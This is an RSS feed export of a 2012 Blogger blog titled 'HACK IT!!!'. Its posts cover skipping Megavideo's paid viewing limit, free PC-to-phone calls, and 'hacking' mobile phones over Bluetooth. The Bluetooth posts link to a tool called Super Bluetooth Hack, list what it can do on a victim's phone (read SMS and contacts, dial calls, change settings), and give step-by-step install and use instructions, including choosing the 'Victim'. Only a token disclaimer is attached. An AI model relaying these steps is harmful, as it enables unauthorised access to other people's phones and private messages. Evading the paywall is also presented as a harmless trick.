<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-2661750801133822613</atom:id><lastBuildDate>Fri, 01 Nov 2024 12:37:56 +0000</lastBuildDate><title>HACK IT!!!</title><description>&lt;u&gt;&lt;b&gt;Hack IT!!!&lt;/b&gt;&lt;/u&gt;&lt;br&gt;
This blog is for those who interested in Hacking. Here we discuss about how to become a Hacker. We provide several tips &amp;amp; tricks to hack the things around you. It increase your knowledge and have fun to be an &lt;b&gt;HACKER&lt;/b&gt;.</description><link>http://hackit2012.blogspot.com/</link><managingEditor>noreply@blogger.com (Anonymous)</managingEditor><generator>Blogger</generator><openSearch:totalResults>54</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:summary>Hack IT!!! This blog is for those who interested in Hacking. Here we discuss about how to become a Hacker. We provide several tips &amp;amp; tricks to hack the things around you. It increase your knowledge and have fun to be an HACKER.</itunes:summary><itunes:subtitle>Hack IT!!! This blog is for those who interested in Hacking. Here we discuss about how to become a Hacker. We provide several tips &amp;amp; tricks to hack the things around you. It increase your knowledge and have fun to be an HACKER.</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-4774459130578319135</guid><pubDate>Thu, 16 Feb 2012 10:32:00 +0000</pubDate><atom:updated>2012-02-16T16:02:31.041+05:30</atom:updated><title>-:How to WATCH MEGAVIDEO MOVIES full free without any interruption......?:-</title><description>Hi readers....&lt;br /&gt;
I think you all are interested in watching ONLINE MOVIES like me.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5gevCE4OKOA014xQoI8iCcVimZk7oaH7xRVuEmThex8lIZuASBIhSCKRnhSFgunAxEcECdnnJmkqJrKfE8MulDCnRToa1JqylTRfl_7UNBptNsYnNlZjP2gvqh0vM8e6_urdf3LiGzn8/s1600/megavideo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5gevCE4OKOA014xQoI8iCcVimZk7oaH7xRVuEmThex8lIZuASBIhSCKRnhSFgunAxEcECdnnJmkqJrKfE8MulDCnRToa1JqylTRfl_7UNBptNsYnNlZjP2gvqh0vM8e6_urdf3LiGzn8/s1600/megavideo.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;I think Most of you choose MEGAVIDEO to watch online movies(like me).&lt;br /&gt;
But most of the time during the show goes on, an interrupt screen appears (just like the following screenshot).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7rwqXyAXDtDgdgk_TkLE3NBcDHSthhmSvnaSUQw2sMB3to0ZsZ9ZnBtMaYKlIZsdQD_QtUyTciQDl-DUHu4ZCd4p02JhXi5cqr-tnpqyuC6jPk3vBJFXER1pNV2G_Mnu4Nti7CdFK7Vk/s1600/megavideo+limit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7rwqXyAXDtDgdgk_TkLE3NBcDHSthhmSvnaSUQw2sMB3to0ZsZ9ZnBtMaYKlIZsdQD_QtUyTciQDl-DUHu4ZCd4p02JhXi5cqr-tnpqyuC6jPk3vBJFXER1pNV2G_Mnu4Nti7CdFK7Vk/s1600/megavideo+limit.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If we click the link 'CLICK HERE' ,we'll have to pay for continue watching movie.&lt;br /&gt;
&amp;nbsp;I searched in the net to get rid out of this &amp;amp; got an easy solution to watch online movies full freely.&lt;br /&gt;
I'm sharing the solution with u.&lt;br /&gt;
Here it is :&lt;br /&gt;
1) Go to EZYWATCH.com&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP0AzjitHr3Oq1UH3hBZ_8X1sPNEngNzJAGb_AQUErC0H0ixShMd1C6SWj7kS5bk72a4gGtj8nN3ZrezaxEF6Z8RSH-JC9tsV6j946Qb_JXoH5NBD_wQU2QONUoTvQVI7psqas-GS1TQI/s1600/ezyweb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP0AzjitHr3Oq1UH3hBZ_8X1sPNEngNzJAGb_AQUErC0H0ixShMd1C6SWj7kS5bk72a4gGtj8nN3ZrezaxEF6Z8RSH-JC9tsV6j946Qb_JXoH5NBD_wQU2QONUoTvQVI7psqas-GS1TQI/s320/ezyweb.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;2) Type the megavideo movie URL ( of the movie u wish 2 watch) in the allocated SPACE.&lt;br /&gt;
3) click WATCH.&lt;br /&gt;
4) click " WATCH MOVIE ON FREE PLAYER ".&lt;br /&gt;
5) U are done.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; HAVE FUN.....</description><link>http://hackit2012.blogspot.com/2012/02/how-to-watch-megavideo-movies-full-free.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5gevCE4OKOA014xQoI8iCcVimZk7oaH7xRVuEmThex8lIZuASBIhSCKRnhSFgunAxEcECdnnJmkqJrKfE8MulDCnRToa1JqylTRfl_7UNBptNsYnNlZjP2gvqh0vM8e6_urdf3LiGzn8/s72-c/megavideo.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-5196050156562846662</guid><pubDate>Thu, 16 Feb 2012 09:57:00 +0000</pubDate><atom:updated>2012-02-16T15:36:22.605+05:30</atom:updated><title>-:HOW TO HACK A MOBILE.........?:-</title><description>How to&amp;nbsp; HACK CELLPHONES through BLUETOOTH, and how to PROTECT yourself..........?&lt;br /&gt;
&lt;br /&gt;
Hacking into your cell phone through bluetooth is now so simple that the hacker don’t even need to have any hacking skills.&lt;br /&gt;
All he need is your bluetooth enabled.&lt;br /&gt;
And you may not realize that walking around with Bluetooth enabled on your cell phone you are at the mercy of&amp;nbsp; hackers.&lt;br /&gt;
They can easily connect and manipulate your phone simply by using a Bluetooth connection.&amp;nbsp; &lt;br /&gt;
We’re here to explain how it’s done and how to protect yourself from such an attack.&lt;br /&gt;
&lt;br /&gt;
Many people turn on Bluetooth to use a headset or sync with their  computer, and then simply forget to turn it back off when they’re done.&amp;nbsp;  &lt;br /&gt;
This is why Bluetooth hacking has become so prevalent and so easy to do.&lt;br /&gt;
&lt;br /&gt;
Here’s how it’s done; a hacker can simply download a software called Super Bluetooth Hack and install it into his cell phone.&lt;br /&gt;
This software can be used for controlling and reading information from remote phone via bluetooth or infra. &lt;br /&gt;
Phone list and SMS can be stored in HTML format. In addition to it, it  will display information about battery, network and sim card.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;It is important that the victim should accept the Bluetooth connection  first time, but this step is required just once for pairing the phones. &lt;br /&gt;
Then it doesn’t require to pair the phones the next time.&lt;br /&gt;
&lt;br /&gt;
The latest version of Super Bluetooth Hack offers following functions if configured correctly:&lt;br /&gt;
- Informations: display informations about battery, network, sim card&lt;br /&gt;
- Ringing: playing sounds of incoming call, alarm clock.&lt;br /&gt;
- Calls: dialing number, ending a call..&lt;br /&gt;
- Language: change language in phone&lt;br /&gt;
- Keys, Pressed keys: pressing and watching pressed keys&lt;br /&gt;
- Contacts&lt;br /&gt;
- Reading SMS&lt;br /&gt;
- Silent mode: turning on or off&lt;br /&gt;
- Phone functionality: turning off the network / phone&lt;br /&gt;
- Hlasitosť zvonenia&lt;br /&gt;
- Alarms:&lt;br /&gt;
- Clock: change date and time&lt;br /&gt;
- Phone locks&lt;br /&gt;
- Clip, Clir&lt;br /&gt;
- Change network operator&lt;br /&gt;
- Java: start, delete java applications&lt;br /&gt;
- Media Player&lt;br /&gt;
- Text&lt;br /&gt;
- SE applications&lt;br /&gt;
- Calendar&lt;br /&gt;
- Keys sound&lt;br /&gt;
- temperature&lt;br /&gt;
- Paired devices:&lt;br /&gt;
- Volume&lt;br /&gt;
- Memory status:&lt;br /&gt;
- Radio icon&lt;br /&gt;
- Keylock&lt;br /&gt;
&lt;br /&gt;
Check out the tool from the download link given below and try out this tool in your Symbian phones..n have Fun....!!!!...:)&lt;br /&gt;
&lt;a href="http://goo.gl/wRAqU" target="_blank"&gt;To download CLICK HERE.&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
To know how to install SUPER BLUETOOTH HACK &lt;a href="http://hackit2012.blogspot.com/2012/02/how-to-download-install-bluetooth.html"&gt;CLICK HERE.&lt;/a&gt;</description><link>http://hackit2012.blogspot.com/2012/02/how-to-hack-mobile.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-366334651025038125</guid><pubDate>Thu, 16 Feb 2012 09:50:00 +0000</pubDate><atom:updated>2012-02-16T15:31:55.340+05:30</atom:updated><title>-:HOW TO DOWNLOAD &amp; INSTALL bluetooth hacking software (Super Bluetooth Hack)....?:-</title><description>HOW TO&amp;nbsp; DOWNLOAD &amp;amp; INSTALL bluetooth hacking software (Super Bluetooth Hack)&lt;br /&gt;
&lt;br /&gt;
To download the software&amp;nbsp;&lt;a href="http://goo.gl/wRAqU" target="_blank"&gt;CLICK HERE.&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Simply follow these simple steps to Install Super Bluetooth Hack in to  your mobile. This software works best at symbian platform but many other  models supporting java can also run this software.&amp;nbsp; To check if your  mobile is supported or not, check the PHONE LIST at the bottom.&lt;br /&gt;
&lt;br /&gt;
1: Download SUPER BLUETOOTH HACK to PC.&lt;br /&gt;
2: Transfer it to your Bluetooth enabled mobile.&lt;br /&gt;
3: Run the Installer (Remember, You must have Java enabled phone for installing )&lt;br /&gt;
4: He finds it and you will be able to run program&lt;br /&gt;
5:Select the language and configure it.&lt;br /&gt;
&lt;br /&gt;
6: Click &amp;gt; Connection&lt;br /&gt;
7: Click &amp;gt; Search Devices&lt;br /&gt;
8: Choose the “Victim”&lt;br /&gt;
9: And start managing with following hacks mentioned with Bluetooth.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Change the language to English (As ur wish):&lt;br /&gt;
If the software starts with the language “Slovencina”, you can change it to English on this way:&lt;br /&gt;
1.If you start the application for the first time you see “Nastavenia” in the title.&lt;br /&gt;
2. Go a bit down until you see “Jazyk”.&lt;br /&gt;
3. Click choose.&lt;br /&gt;
4. Select “English”.&lt;br /&gt;
5. Click “More”.&lt;br /&gt;
6. Click “Spat”.&lt;br /&gt;
7. Now the program is in English.&lt;br /&gt;
&lt;br /&gt;
To know HOW TO HACK,&amp;nbsp;&lt;a href="http://hackit2012.blogspot.com/2012/02/how-to-hack-mobile.html"&gt;CLICK HERE.&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
Supporting PHONE LIST:&lt;br /&gt;
&lt;br /&gt;
Acer: beTouch E100(C1), beTouch E101(E1), beTouch E200(L1), DX650, DX900, F900, M900, neoTouch(F1), X960&lt;br /&gt;
&lt;br /&gt;
Alcatel: One Touch 557a, One Touch 756, One Touch C550, One Touch C552a,  One Touch C630, One Touch C652, One Touch S621, One Touch S626, One  Touch V570, Mandarina Duck, Mandarina Duck Moon, N1 ELLE GlamPhone, N3  ELLE GlamPhone, One Touch 660, One Touch 708 Mini, One Touch 800 Tribe,  One Touch C552, One Touch C700, One Touch C701, One Touch C707, One  Touch C717, One Touch C750, One Touch C820, One Touch C825, One Touch  S320, One Touch S853, One Touch S920, One Touch V670, One Touch V770&lt;br /&gt;
&lt;br /&gt;
Amoi: 8512, 8709, E850&lt;br /&gt;
&lt;br /&gt;
Asus: M307, P535, V66, M20 Nuvifone, M310, P320, P525, P526, P550, P552, P750, P835, V75, V80&lt;br /&gt;
&lt;br /&gt;
Audiovox: SMT 5600&lt;br /&gt;
&lt;br /&gt;
BenQ: P50, C30, EF51&lt;br /&gt;
&lt;br /&gt;
BenQ-Siemens: CL71, E81, E61, E71, EF91, S81, S88, SL91&lt;br /&gt;
&lt;br /&gt;
BlackBerry: 7100i, 7130, 7130e, 7250, 7290, 7520, 8100, 8110, 8120,  8130, 8220, 8300, 8310, 8320, 8330, 8700, 8703e, 8707, 8800, 8820, 8830,  Bold 9000, curve 8520, Curve 8900, Storm 2, Storm 9500, Storm 9530,  Tour 9630&lt;br /&gt;
&lt;br /&gt;
CECT: A1000&lt;br /&gt;
&lt;br /&gt;
Cingular: 2125&lt;br /&gt;
&lt;br /&gt;
Dopod: 515, 565, 575, 585, 557w, 586w, 595, C720W&lt;br /&gt;
&lt;br /&gt;
Fly: SX210&lt;br /&gt;
&lt;br /&gt;
HP: iPAQ 910c, iPAQ 510 Mobile Messenger&lt;br /&gt;
&lt;br /&gt;
HTC: HD2, P3600, Touch Pro 2, 6800, EVO 4G, MTeoR, myTouch 3G Slide,  P3000, P3350, P3400, P3450, P3470, P3600i, S650, Touch, Touch 2, Touch  3G, Touch Cruise, Touch Diamond, Touch Dual, Touch HD, Touch Pro, Touch  Viva, TyTN II&lt;br /&gt;
&lt;br /&gt;
Huawei: M750, U526, U626&lt;br /&gt;
&lt;br /&gt;
I-mobile: 510&lt;br /&gt;
&lt;br /&gt;
K-Touch: A905&lt;br /&gt;
&lt;br /&gt;
LG: B2070, B2150, C1100, C1150, C2600, C3400, GM200 Brio, GS190, GS290  Cookie Fresh, GW300, KC910, KE770, KS20, KS360, KU450, MG100a, MG105,  MG220, T300, U8330, VX7000, C2000, CG225, CU320, CU400, CU500, CU720,  CU915, CU920, F2400, KE500, KE600, KE800, KE820, KE970, KE990, KF750,  KG195, KG200, KG220, KG225, KG240, KG245, KG290, KG300, KG320, KP500,  KU580, KU800, KU830, KU970, KU990, LG550, LX550, LX570, M4410, MX510,  P7200, S5200, Trax CU575, TU500, TU515, TU575, TU915, U310, U8210,  U8290, U8500, U880, V9000, VX9400, VX9900&lt;br /&gt;
&lt;br /&gt;
Lenovo: V800&lt;br /&gt;
&lt;br /&gt;
MITO: 302, 8800&lt;br /&gt;
&lt;br /&gt;
Micromax: GC700, Q5 fb, Q7, X600&lt;br /&gt;
&lt;br /&gt;
Mitac: Mio 8390, Mio 8860, Mio 8870&lt;br /&gt;
&lt;br /&gt;
Motorola: A1000, A630, A668, A728, A732, A760, C380, C390, C650, C975,  E398, E398B, E398i, E550, E815, EX128, i930, Razr V3, RAZR V3a, RAZR  V3m, V180, V186, V188, V220, V300, V303, V3v, V400, V500, V505, V525,  V525M, V535, V545, V550, V551, V555, V600, V600i, V620, V635, V690, V80,  V975, W220, W395, A1200, A1210, A1600, A3100, A780, A810, C257, C261,  C290, E1000, E1070, E680, E680i, E770, E770-Vodafone, E790, i580, i830,  i850, IC402, IC502, IC902, K1, K3, KZRK K1, L6, L6i, L7-Vodafone, L71,  Motoming A1600, Motozine ZN5, MPx220, PEBL U3, Q, Q Plus, Razr V3x, RAZR  V3xx, RAZR V3xxv, RAZR V6, RAZR2 V8, RAZR2 V9, RAZR2 V9m, RIZR Z10,  RIZR Z8, ROKR E1, ROKR E2, ROKR E6, ROKR Z6, ROKR Z6m, SLVR L7, SLVR  L7e, SLVR L7i, SLVR L9, U9, V1075, V1100, V177, V190, V191, V195, V197,  V235, V360, V360-Vodafone, V365, V3c, V3i, V3m, V3r, V3t, V3x-Vodafone,  V557, V980, V980M, W315, W375, W490, W510, Z3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
NEC: e616, N600&lt;br /&gt;
&lt;br /&gt;
Nokia: 1682c, 2220 slide, 3152, 3220, 5232, 5250, 6030, 6124 classic,  6260, 6303 Classic, 6600, 6620, 6670, 6710 Navigator, 6720 classic, 6730  classic, 6760 slide, 6788, 6790, 7230, 7610, 8800, C3-00, C5-00, C5-01,  C5-03, C6-00, E5-00, N70-1, X2, X5-00, X5-01, 1680c, 2320c, 2323c,  2330c, 2600 classic, 2610, 2626, 2630, 2660, 2680, 2690, 2700 classic,  2720 Fold, 2730c, 2760, 2855, 2855i, 2865, 2865i, 3109 classic, 3110c,  3120 classic, 3155, 3155i, 3208c, 3230, 3250, 3555, 3600 slide, 3610  Fold, 3710 Fold, 3711 Fold, 3720c, 5000, 5070, 5130XM, 5140, 5140i,  5200, 5220 XpressMusic, 5228, 5230, 5300, 5310 XpressMusic, 5320, 5500,  5530XM, 5610, 5611XM, 5630XM, 5700, 5730XM, 5800 XpressMusic, 6020,  6021, 6060, 6060v, 6061, 6070, 6080, 6085, 6086, 6101, 6102, 6102i,  6103, 6110 Navigator, 6111, 6120, 6120c, 6121 classic, 6125, 6126, 6131,  6133, 6151, 6152, 6155, 6165, 6165i, 6170, 6210 Navigator, 6220  Classic, 6230, 6230i, 6233, 6234, 6235, 6235i, 6255, 6255i, 6265, 6265i,  6267, 6270, 6275i, 6280, 6288, 6290, 6300, 6301, 6500c, 6500s, 6555,  6600 slide, 6630, 6680, 6681, 6682, 6708, 6822, 7070, 7210 Supernova,  7260, 7270, 7360, 7370, 7373, 7390, 7500, 7510 Supernova, 7710, 8600  Luna, 8800 Sirocco, 9300, 9300i, 9500, 97 mini, C6, E50, E51, E52, E55,  E60, E61, E61i, E62, E63, E65, E66, E70, E71, E71x, E72, E73, E75, E90,  N70, N71, N72, N73, N75, N76, N77, N78, N79, N80, N81, N81 8GB, N82,  N85, N86, N90, N91, N92, N93, N93i, N95, N95 8GB, N96, N97, N97 Mini,  X3, X6&lt;br /&gt;
O2: Ice&lt;br /&gt;
&lt;br /&gt;
ONIDA: G720&lt;br /&gt;
&lt;br /&gt;
Orange: SPV, SPV C100, SPV C500, SPV C550, SPV C600, SPV C700, SPV e100, SPV E200&lt;br /&gt;
&lt;br /&gt;
Palm: Treo 500v&lt;br /&gt;
&lt;br /&gt;
Panasonic: SC3, X500, VS2, VS3, VS6&lt;br /&gt;
&lt;br /&gt;
Pantech: PG-1400, PG-1410, PG-C300&lt;br /&gt;
&lt;br /&gt;
Philips: 568, 755, 756, S890, 588, 766, 768, 960, S900&lt;br /&gt;
&lt;br /&gt;
QTek: 7070, 9100, 8020, 8080, 8100, 8300, 8310, 8500&lt;br /&gt;
&lt;br /&gt;
RoverPC: M1&lt;br /&gt;
&lt;br /&gt;
SPV: C500, C550&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sagem: MY C4-2, MY C5-2, MY C5-2 Vodafone, MY C5-3, MY V-55, MY V-56, MY  V-65, MY V-75, MY X-4, MY X-5-2T, MY X-6, MY X-7, MY X-8, MY X5-2, MY  X5-2M, myX5-2v, Sagem myS-7, MY 302X, MY 301X, MY 400V, MY 400x, MY  401C, MY 401X, MY 401Z, MY 405X, MY 419X, MY 501c, MY 501X, MY 600v, MY  600x, MY 700X, MY W-7, MY X6-2, MY Z-5, my411X&lt;br /&gt;
&lt;br /&gt;
Samsung: A877 Impression, B3210 CorbyTXT, B3310, B3410, B5310 CorbyPRO,  C3212, C3222, C3300K Champ, C3510 Genoa, C5010 Squash, C5212, E1410,  E2120, E2152, F270 Beat, GT B5722, GT C3303k, GT C6625, GT S3653 Corby,  GT S5233A, GT S5253, I8000 Omnia II, J150, S3100, S3310, S3600, S5350  Shark, SGH C130, SGH C160, SGH C200, SGH C207, SGH C207L, SGH C210, SGH  C230, SGH C300, SGH C400, SGH D410, SGH D720, SGH E300, SGH E310, SGH  E310C, SGH E315, SGH E316, SGH E530, SGH E568, SGH E600, SGH E620, SGH  E710, SGH E715, SGH E720, SGH E728, SGH i710, SGH i780, SGH P300, SGH  P400, SGH P510, SGH P777, SGH t401g, SGH U600, SGH X105, SGH X120, SGH  X160, SGH X200, SGH X210, SGH X300, SGH X430, SGH X450, SGH X480, SGH  X486, SGH X500, SGH X510, SGH X530, SGH X630, SGH X636, SGH X660, SGH  X680, SGH X686, SGH Z107, A717, C3010, Galaxy i7500, i300, i320, i320N,  i8510, i8910, Instinct M800, S5620 Monte, SCH A870, SGH A701, SGH A707,  SGH A827, SGH C140, SGH C170, SGH C260, SGH C406, SGH C417, SGH D407,  SGH D500, SGH D500C, SGH D500E, SGH D510, SGH D520, SGH D600, SGH D600E,  SGH D800, SGH D807, SGH D820, SGH D830, SGH D836, SGH D840, SGH D880,  SGH D900, SGH D908, SGH E200, SGH E210, SGH E250, SGH E330N, SGH E340,  SGH E340E, SGH E350, SGH E350E, SGH E360, SGH E370, SGH E376, SGH E380,  SGH E388, SGH E390, SGH E420, SGH E490, SGH E500, SGH E570, SGH E690,  SGH E730, SGH E736, SGH E740, SGH E760, SGH E780, SGH E788, SGH E810,  SGH E830, SGH E840, SGH E870, SGH E878, SGH E890, SGH E898, SGH E900,  SGH E950, SGH F480, SGH F490, SGH F500, SGH G600, SGH G810, SGH i300,  SGH I320, SGH i450, SGH i550, SGH i560, SGH i600, SGH I607, SGH i617,  SGH i900, SGH J600, SGH J700, SGH J750, SGH L760, SGH M600, SGH P200,  SGH P310, SGH P850, SGH P900, SGH P906, SGH P910, SGH P920, SGH T209,  SGH T219, SGH T319, SGH T329, SGH T509, SGH T509S, SGH T519, SGH T609,  SGH T619, SGH T629, SGH T729, SGH T809, SGH U900, SGH X490, SGH X495,  SGH X506, SGH X507, SGH X520, SGH X540, SGH X620, SGH X620C, SGH X640,  SGH X640C, SGH X648, SGH X650, SGH X670, SGH X700, SGH X820, SGH X830,  SGH Z140, SGH Z170, SGH Z230, SGH Z240, SGH Z300, SGH Z370, SGH Z400,  SGH Z400V, SGH Z500, SGH Z510, SGH Z530, SGH Z540, SGH Z560, SGH Z630,  SGH Z720, SGH ZV10, SGH ZV40, SGH ZV50, SGH-i600, SGH-i607, SGH-L700,  SGH-P520, SGH-V820L, SPH A900, SPH A900P, SPH A920, SPH A940, SPH A960,  SPH M500, SPH M510, SPH M610, SPH M620, Z130, Z150&lt;br /&gt;
&lt;br /&gt;
Sanyo: S750, SCP-6600&lt;br /&gt;
&lt;br /&gt;
Sharp: 550SH, 703, 705SH, 802, 802SH, 825SH, 880SH, 902, 903, 904,  923SH, 930SH, 934SH, 936SH, 940SH, GX-L15, GX15, GX17, GX25, GX29,  GXT15, 770SH&lt;br /&gt;
&lt;br /&gt;
Siemens: AP75, C65, C65-Vodafone, C66, C72, C75, CF75, CF76, CX65, CX70,  CX75, EF81, M65, M75, ME75, S65, S75, SK65, SL65, SL75, ST60&lt;br /&gt;
&lt;br /&gt;
Sony-Ericsson: C510, Equinox TM717, Hazel, J105 Naite, J108i Cedar,  J220i, P900, P910, P910a, P910i, T715, u10i Aino, U5i Vivaz, W395, W595,  W595s, W610i, W980, W995, Zylo, C702, C902, C905, D750, D750i, F305,  F500i, G502, G700, G900, J300a, J300i, K200i, K300, K300a, K300i, K310,  K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i,  K550i, K600, K600i, K608i, K610, K610i, K618i, K630, K660i, K700, K700c,  K700i, K750, K750i, K770, K790a, K790i, K800i, K800iv, K810i, K850i,  M600i, P1i, P990i, S302, S500i, S700, S700i, S710a, T250i, T650i, V600,  V600i, V630i, W200a, W200i, W300, W300i, W350, W380, W550c, W550i,  W580i, W600c, W600i, W660i, W700i, W710i, W760, W800i, W810i, W810iv,  W830i, W850i, W850iv, W880i, W890i, W900i, W910i, W950i, W960, X1,  Z1010, Z300i, Z310i, Z310iv, Z500, Z500a, Z520a, Z520i, Z530i, Z550a,  Z550i, Z555, Z558i, Z610i, Z710i, Z750, Z800&lt;br /&gt;
&lt;br /&gt;
Spice: M6363, S7000, D-90&lt;br /&gt;
&lt;br /&gt;
T-Mobile: SDA, SDA (US name), MDA Dash, MDA Mail, SDA II, SDA Music&lt;br /&gt;
&lt;br /&gt;
Tatung: M1&lt;br /&gt;
&lt;br /&gt;
Toshiba: G500&lt;br /&gt;
&lt;br /&gt;
VK Mobile: VK4000&lt;br /&gt;
&lt;br /&gt;
Vodafone: v1210, v1240, VDA II, VDA IV&lt;br /&gt;
&lt;br /&gt;
ZTE: F866, T930&lt;br /&gt;
&lt;br /&gt;
i-mate: Smartphone2, SP Jas, SP3, SP3i, SP5, SP5m, SPL.&lt;br /&gt;
&lt;br /&gt;
Disclaimer: I have outlined these software for your information and knowledge purpose only. &lt;br /&gt;
It’s an advice to all the multimedia phone users to keep off your  Bluetooth and if any harm will occur then we do not take any  responsibility.&lt;br /&gt;
&lt;br /&gt;
POST SOURCE: INTERNET.</description><link>http://hackit2012.blogspot.com/2012/02/how-to-download-install-bluetooth.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>4</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-1167669114236429682</guid><pubDate>Thu, 16 Feb 2012 09:35:00 +0000</pubDate><atom:updated>2012-02-16T15:06:44.698+05:30</atom:updated><title>-:Make Free Calls From Pc To Phone In Anywhere In The World:-</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcL3qoi_up_ppEy5rlgs6rBC8lKblAMTTLDLnkLagBSeh5ufCZAk8vdgqtmWTQqFpw1pcMjW-OGbx64FBHhqEIcZq7_6YuYpZFiFZW4ZbE7NX6ct2mgLsUd9xVIObk4YrX6I8wPboQmTw/s1600/images_3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcL3qoi_up_ppEy5rlgs6rBC8lKblAMTTLDLnkLagBSeh5ufCZAk8vdgqtmWTQqFpw1pcMjW-OGbx64FBHhqEIcZq7_6YuYpZFiFZW4ZbE7NX6ct2mgLsUd9xVIObk4YrX6I8wPboQmTw/s1600/images_3.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
There are many sites which help you to send free SMS anywhere in the world, but do you know how to make a FREE CALL?&lt;br /&gt;
If not, then here it is........!!!&lt;br /&gt;
EvaPhone is Website which gives you a platform to make an International calls through your PC without any software.&lt;br /&gt;
We can make a call to almost every nations,either on mobile or land line.&lt;br /&gt;
The only thing is that your calls are limited to certain length.&lt;br /&gt;
The free call duration varies depending on the call destination and line provider. &lt;br /&gt;
The maximum free call allowance for some countries can go up to 5 minutes per call and 2 calls per day.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp; * How to make a Call&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1.Just go to &lt;a href="http://www.evaphone.com/locale/en" target="_blank"&gt;EVAPHONE WEBSITE&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_Y-5dnP3-Ze8JxujdOAsyE78QsJgxZcUMurNrbLR2KlRIsIIovCkHZE-ItUTEq4u-JJTVckWXXWgc0jH8tRRhhbmHDoRCnrqj40HG-KPBgrrucuVlk7kTeqp6LJXcOppCkvejdLFFCo/s1600/1.EvaPhone-Free-Call-Worldwide-.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_Y-5dnP3-Ze8JxujdOAsyE78QsJgxZcUMurNrbLR2KlRIsIIovCkHZE-ItUTEq4u-JJTVckWXXWgc0jH8tRRhhbmHDoRCnrqj40HG-KPBgrrucuVlk7kTeqp6LJXcOppCkvejdLFFCo/s320/1.EvaPhone-Free-Call-Worldwide-.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.Simply dial the country code and the number where you want to call.&lt;br /&gt;
&amp;nbsp;&amp;nbsp; Note that you can check the Free minutes from their Free Minute&amp;nbsp; tab.&lt;br /&gt;
&lt;br /&gt;
